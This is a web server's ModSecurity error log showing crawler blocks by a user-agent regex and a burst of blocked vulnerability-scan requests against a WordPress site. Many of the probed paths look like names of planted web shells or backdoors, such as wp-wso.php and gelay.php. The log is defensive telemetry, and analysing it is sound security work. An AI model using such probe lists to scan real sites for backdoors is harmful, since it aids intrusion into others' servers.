[Tue May 26 13:13:01.759696 2026] [security2:error] [pid 496740:tid 496890] [client 216.244.66.241:43280] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/intermercurialfffa/bcddaa1473733.shtml"] [unique_id "ahVPBevOeft4ltnLrH5BPAAAABQ"]
[Tue May 26 13:13:01.759825 2026] [security2:error] [pid 496740:tid 496890] [client 216.244.66.241:43280] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/intermercurialfffa/bcddaa1473733.shtml"] [unique_id "ahVPBevOeft4ltnLrH5BPAAAABQ"]
[Tue May 26 13:13:01.999808 2026] [security2:error] [pid 496740:tid 496980] [client 108.136.131.13:64483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/certificates/index.php"] [unique_id "ahVPBevOeft4ltnLrH5BRQAAAG4"]
[Tue May 26 13:13:02.039722 2026] [security2:error] [pid 496740:tid 496991] [client 220.93.109.112:57287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 112.109.93.220.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVPBevOeft4ltnLrH5BQAAAAHk"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 13:13:02.200231 2026] [security2:error] [pid 496740:tid 496901] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPBevOeft4ltnLrH5BPwAAAB8"]
[Tue May 26 13:13:02.422657 2026] [security2:error] [pid 496740:tid 496935] [client 108.136.131.13:50577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/css/wp-login.php"] [unique_id "ahVPBuvOeft4ltnLrH5BWgAAAEE"]
[Tue May 26 13:13:02.424721 2026] [security2:error] [pid 496740:tid 496897] [client 108.136.131.13:50579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/css/gelay.php"] [unique_id "ahVPBuvOeft4ltnLrH5BWwAAABs"]
[Tue May 26 13:13:02.427620 2026] [security2:error] [pid 496740:tid 496989] [client 108.136.131.13:50573] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/css/index.php"] [unique_id "ahVPBuvOeft4ltnLrH5BXAAAAHc"]
[Tue May 26 13:13:02.434757 2026] [security2:error] [pid 496740:tid 496905] [client 108.136.131.13:50578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/css/themes.php"] [unique_id "ahVPBuvOeft4ltnLrH5BXgAAACM"]
[Tue May 26 13:13:02.446525 2026] [security2:error] [pid 496740:tid 496987] [client 108.136.131.13:50587] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/cron.php"] [unique_id "ahVPBuvOeft4ltnLrH5BXwAAAHU"]
[Tue May 26 13:13:02.868213 2026] [security2:error] [pid 496740:tid 496973] [client 108.136.131.13:50767] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/fonts/about.php"] [unique_id "ahVPBuvOeft4ltnLrH5BcQAAAGc"]
[Tue May 26 13:13:02.872168 2026] [security2:error] [pid 496740:tid 496898] [client 108.136.131.13:50768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/fonts/dev.php"] [unique_id "ahVPBuvOeft4ltnLrH5BcgAAABw"]
[Tue May 26 13:13:02.873948 2026] [security2:error] [pid 496740:tid 496977] [client 108.136.131.13:50769] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/fonts/iq.php"] [unique_id "ahVPBuvOeft4ltnLrH5BcwAAAGs"]
[Tue May 26 13:13:02.889590 2026] [security2:error] [pid 496740:tid 496936] [client 108.136.131.13:50765] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/customize/index.php"] [unique_id "ahVPBuvOeft4ltnLrH5BdwAAAEI"]
[Tue May 26 13:13:02.892360 2026] [security2:error] [pid 496740:tid 496961] [client 108.136.131.13:50766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/default.php"] [unique_id "ahVPBuvOeft4ltnLrH5BegAAAFs"]
[Tue May 26 13:13:03.317488 2026] [security2:error] [pid 496740:tid 496923] [client 108.136.131.13:51455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/fonts/iqb.php"] [unique_id "ahVPB-vOeft4ltnLrH5BjwAAADU"]
[Tue May 26 13:13:03.325786 2026] [security2:error] [pid 496740:tid 496874] [client 108.136.131.13:51451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/ID3/index.php"] [unique_id "ahVPB-vOeft4ltnLrH5BkAAAAAQ"]
[Tue May 26 13:13:03.334231 2026] [security2:error] [pid 496740:tid 496993] [client 108.136.131.13:51452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/images/include.php"] [unique_id "ahVPB-vOeft4ltnLrH5BkQAAAHs"]
[Tue May 26 13:13:03.336053 2026] [security2:error] [pid 496740:tid 496889] [client 108.136.131.13:51450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/fw.php"] [unique_id "ahVPB-vOeft4ltnLrH5BkgAAABM"]
[Tue May 26 13:13:03.346946 2026] [security2:error] [pid 496740:tid 496985] [client 108.136.131.13:51453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/images/wp-login.php"] [unique_id "ahVPB-vOeft4ltnLrH5BkwAAAHM"]
[Tue May 26 13:13:03.773710 2026] [security2:error] [pid 496740:tid 496898] [client 108.136.131.13:51678] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/js/index.php"] [unique_id "ahVPB-vOeft4ltnLrH5BsQAAABw"]
[Tue May 26 13:13:03.779715 2026] [security2:error] [pid 496740:tid 496961] [client 108.136.131.13:51663] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/index.php"] [unique_id "ahVPB-vOeft4ltnLrH5BswAAAFs"]
[Tue May 26 13:13:03.780079 2026] [security2:error] [pid 496740:tid 496958] [client 108.136.131.13:51667] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/inputs.php"] [unique_id "ahVPB-vOeft4ltnLrH5BtAAAAFg"]
[Tue May 26 13:13:03.786021 2026] [security2:error] [pid 496740:tid 496890] [client 108.136.131.13:51671] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/js/crop/index.php"] [unique_id "ahVPB-vOeft4ltnLrH5BtwAAABQ"]
[Tue May 26 13:13:04.467901 2026] [security2:error] [pid 496740:tid 496961] [client 108.136.131.13:51668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/js/jcrop/Jcrop.php"] [unique_id "ahVPCOvOeft4ltnLrH5B9wAAAFs"]
[Tue May 26 13:13:04.580568 2026] [security2:error] [pid 496740:tid 496974] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPCOvOeft4ltnLrH5B5AAAAGg"]
[Tue May 26 13:13:04.664502 2026] [security2:error] [pid 496740:tid 496926] [client 108.136.131.13:52536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/l10n.php"] [unique_id "ahVPCOvOeft4ltnLrH5B_wAAADg"]
[Tue May 26 13:13:04.665189 2026] [security2:error] [pid 496740:tid 496918] [client 108.136.131.13:52552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/plugins.php"] [unique_id "ahVPCOvOeft4ltnLrH5CAAAAADA"]
[Tue May 26 13:13:04.667812 2026] [security2:error] [pid 496740:tid 496965] [client 108.136.131.13:52554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/pomo/index.php"] [unique_id "ahVPCOvOeft4ltnLrH5CAQAAAF8"]
[Tue May 26 13:13:04.694560 2026] [security2:error] [pid 496740:tid 496951] [client 108.136.131.13:52551] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/library.php"] [unique_id "ahVPCOvOeft4ltnLrH5CAwAAAFE"]
[Tue May 26 13:13:05.002832 2026] [security2:error] [pid 496740:tid 496886] [client 114.119.130.18:62689] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/blog/influencer-marketing-simplified/"] [unique_id "ahVPCevOeft4ltnLrH5CDwAAABA"], referer: https://mobillegends.net/how-to-use-tiktok-for-business-in-2020-influencer-marketing-tips
[Tue May 26 13:13:05.233603 2026] [security2:error] [pid 496740:tid 496989] [client 108.136.131.13:52895] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/Requests/about.php"] [unique_id "ahVPCevOeft4ltnLrH5CHAAAAHc"]
[Tue May 26 13:13:05.236956 2026] [security2:error] [pid 496740:tid 496935] [client 108.136.131.13:52896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/rest-api/about.php"] [unique_id "ahVPCevOeft4ltnLrH5CHgAAAEE"]
[Tue May 26 13:13:05.237349 2026] [security2:error] [pid 496740:tid 496895] [client 108.136.131.13:52898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/rest-api/index.php"] [unique_id "ahVPCevOeft4ltnLrH5CHQAAABk"]
[Tue May 26 13:13:05.238820 2026] [security2:error] [pid 496740:tid 496897] [client 108.136.131.13:52900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/Text/Diff/index.php"] [unique_id "ahVPCevOeft4ltnLrH5CIAAAABs"]
[Tue May 26 13:13:05.249968 2026] [security2:error] [pid 496740:tid 496875] [client 108.136.131.13:52891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/radio.php"] [unique_id "ahVPCevOeft4ltnLrH5CIwAAAAU"]
[Tue May 26 13:13:05.672577 2026] [security2:error] [pid 496740:tid 496926] [client 108.136.131.13:53711] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/Text/index.php"] [unique_id "ahVPCevOeft4ltnLrH5CNwAAADg"]
[Tue May 26 13:13:05.672901 2026] [security2:error] [pid 496740:tid 496965] [client 108.136.131.13:53712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/themes.php"] [unique_id "ahVPCevOeft4ltnLrH5COAAAAF8"]
[Tue May 26 13:13:05.677612 2026] [security2:error] [pid 496740:tid 496912] [client 108.136.131.13:53715] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/widgets/about.php"] [unique_id "ahVPCevOeft4ltnLrH5COQAAACo"]
[Tue May 26 13:13:05.684041 2026] [security2:error] [pid 496740:tid 496934] [client 108.136.131.13:53713] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/up.php"] [unique_id "ahVPCevOeft4ltnLrH5COgAAAEA"]
[Tue May 26 13:13:05.703710 2026] [security2:error] [pid 496740:tid 496946] [client 108.136.131.13:53714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/upload.php"] [unique_id "ahVPCevOeft4ltnLrH5COwAAAEw"]
[Tue May 26 13:13:06.145289 2026] [security2:error] [pid 496740:tid 496989] [client 108.136.131.13:53957] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/wp-class.php"] [unique_id "ahVPCuvOeft4ltnLrH5CVAAAAHc"]
[Tue May 26 13:13:06.158843 2026] [security2:error] [pid 496740:tid 496897] [client 108.136.131.13:53959] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/x.php"] [unique_id "ahVPCuvOeft4ltnLrH5CWQAAABs"]
[Tue May 26 13:13:06.158986 2026] [security2:error] [pid 496740:tid 496895] [client 108.136.131.13:53956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/widgets/index.php"] [unique_id "ahVPCuvOeft4ltnLrH5CWAAAABk"]
[Tue May 26 13:13:06.389730 2026] [security2:error] [pid 496740:tid 496929] [client 108.136.131.13:53960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/xmlrpc.php"] [unique_id "ahVPCuvOeft4ltnLrH5CVwAAADs"]
[Tue May 26 13:13:06.488672 2026] [security2:error] [pid 496740:tid 496873] [client 108.136.131.13:53958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-includes/wp-login.php"] [unique_id "ahVPCuvOeft4ltnLrH5CVgAAAAM"]
[Tue May 26 13:13:06.914046 2026] [security2:error] [pid 496740:tid 496951] [client 108.136.131.13:54212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-mail.php"] [unique_id "ahVPCuvOeft4ltnLrH5CegAAAFE"]
[Tue May 26 13:13:06.919265 2026] [security2:error] [pid 496740:tid 496954] [client 108.136.131.13:54211] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-login.php"] [unique_id "ahVPCuvOeft4ltnLrH5CewAAAFQ"]
[Tue May 26 13:13:06.930827 2026] [security2:error] [pid 496740:tid 496896] [client 108.136.131.13:54210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-load.php"] [unique_id "ahVPCuvOeft4ltnLrH5CfAAAABo"]
[Tue May 26 13:13:06.931415 2026] [security2:error] [pid 496740:tid 496911] [client 108.136.131.13:54215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-mails.php"] [unique_id "ahVPCuvOeft4ltnLrH5CfQAAACk"]
[Tue May 26 13:13:06.936351 2026] [security2:error] [pid 496740:tid 496932] [client 108.136.131.13:54216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-trackback.php"] [unique_id "ahVPCuvOeft4ltnLrH5CfgAAAD4"]
[Tue May 26 13:13:07.365883 2026] [security2:error] [pid 496740:tid 496989] [client 108.136.131.13:55632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp1.php"] [unique_id "ahVPC-vOeft4ltnLrH5CkwAAAHc"]
[Tue May 26 13:13:07.368123 2026] [security2:error] [pid 496740:tid 496945] [client 108.136.131.13:55615] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp/wp-includes/fonts/dev.php"] [unique_id "ahVPC-vOeft4ltnLrH5ClAAAAEs"]
[Tue May 26 13:13:07.369782 2026] [security2:error] [pid 496740:tid 496897] [client 108.136.131.13:55613] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-wso.php"] [unique_id "ahVPC-vOeft4ltnLrH5ClQAAABs"]
[Tue May 26 13:13:07.372618 2026] [security2:error] [pid 496740:tid 496895] [client 108.136.131.13:55614] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp.php"] [unique_id "ahVPC-vOeft4ltnLrH5ClgAAABk"]
[Tue May 26 13:13:07.378654 2026] [security2:error] [pid 496740:tid 496988] [client 108.136.131.13:55626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp/wp-includes/fonts/iqb.php"] [unique_id "ahVPC-vOeft4ltnLrH5ClwAAAHY"]
[Tue May 26 13:13:07.667287 2026] [security2:error] [pid 496740:tid 496928] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVPC-vOeft4ltnLrH5CjgAAADo"]
